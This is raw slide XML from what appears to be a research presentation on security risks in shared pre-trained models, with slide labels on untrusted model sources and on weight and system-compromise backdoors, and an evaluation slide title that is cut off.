                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy generation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>a priori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>/ off-line)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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8" name="Shape 378"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p33"/>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380" name="Google Shape;380;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Model Ecosystem Facilitates Model Sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Google Shape;381;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785409" y="2972484"/>
            <a:ext cx="985001" cy="985001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Google Shape;382;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964510" y="1117031"/>
            <a:ext cx="3408600" cy="1220100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="E0E0F1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Google Shape;383;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051911" y="1028484"/>
            <a:ext cx="3057969" cy="1129096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Google Shape;385;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8991">
            <a:off x="5105893" y="1986951"/>
            <a:ext cx="344101" cy="903300"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10791009">
            <a:off x="7863409" y="1987810"/>
            <a:ext cx="344101" cy="902700"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="Google Shape;389;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897095" y="2693482"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;391;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897095" y="2693470"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="392" name="Google Shape;392;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6152519" y="3139570"/>
            <a:ext cx="975450" cy="975450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-3029">
            <a:off x="6481201" y="1986862"/>
            <a:ext cx="340500" cy="894600"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8550">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="34086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1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="395" name="Google Shape;395;p33" title="PikPng.com_user-icon-png_398374.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7510100" y="2950112"/>
            <a:ext cx="1029724" cy="1029724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702026"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="397" name="Google Shape;397;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702014"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="1438999"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The open model ecosystem lets engineers share and reuse pre-trained models.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="2571749"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models may come from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>untrusted sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>, inviting security risks.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674050" y="3704500"/>
            <a:ext cx="1473000" cy="736500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D2E9"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Weights backdoors</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2541575" y="3704500"/>
            <a:ext cx="1473000" cy="736500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D2E9"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>System compromise backdoors</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139138" y="4115025"/>
            <a:ext cx="700800" cy="340500"/>
          </a:xfrm>
          <a:prstGeom prst="left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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Google Shape;403;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964525" y="4039250"/>
            <a:ext cx="1029600" cy="615600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Focus of this work</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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93" name="Shape 1093"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
